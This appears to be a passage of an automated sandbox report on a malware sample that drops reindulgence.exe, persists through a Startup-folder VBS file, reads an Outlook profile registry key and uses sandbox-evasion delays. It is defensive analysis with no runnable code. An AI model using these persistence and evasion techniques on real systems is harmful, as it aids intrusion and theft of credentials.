                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: oagkiAhXgZ.exeStatic file information: File size 1111040 > 1048576
                Source: oagkiAhXgZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: oagkiAhXgZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: oagkiAhXgZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: oagkiAhXgZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: oagkiAhXgZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: oagkiAhXgZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: oagkiAhXgZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: reindulgence.exe, 00000002.00000003.2091283334.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000002.00000003.2091160949.0000000003980000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2255477042.0000000003960000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2256338604.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: reindulgence.exe, 00000002.00000003.2091283334.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000002.00000003.2091160949.0000000003980000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2255477042.0000000003960000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2256338604.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
                Source: oagkiAhXgZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: oagkiAhXgZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: oagkiAhXgZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: oagkiAhXgZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: oagkiAhXgZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC0A76 push ecx; ret 0_2_00AC0A89
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F80A76 push ecx; ret 2_2_00F80A89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275891E pushad ; iretd 3_2_0275891F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02758C2F pushfd ; iretd 3_2_02758C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02758DDF push esp; iretd 3_2_02758DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012668F2 push 00000001h; ret 7_2_01266900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD2DC0 pushfd ; retf 7_2_01AD2DC1
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeFile created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbsJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ABF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00ABF98E
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B31C41
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00F7F98E
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00FF1C41
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97613
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeAPI/Special instruction interceptor: Address: 128E0A4
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeAPI/Special instruction interceptor: Address: 1405B6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598121Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597942Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597634Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597528Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597416Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597297Jump to behavior
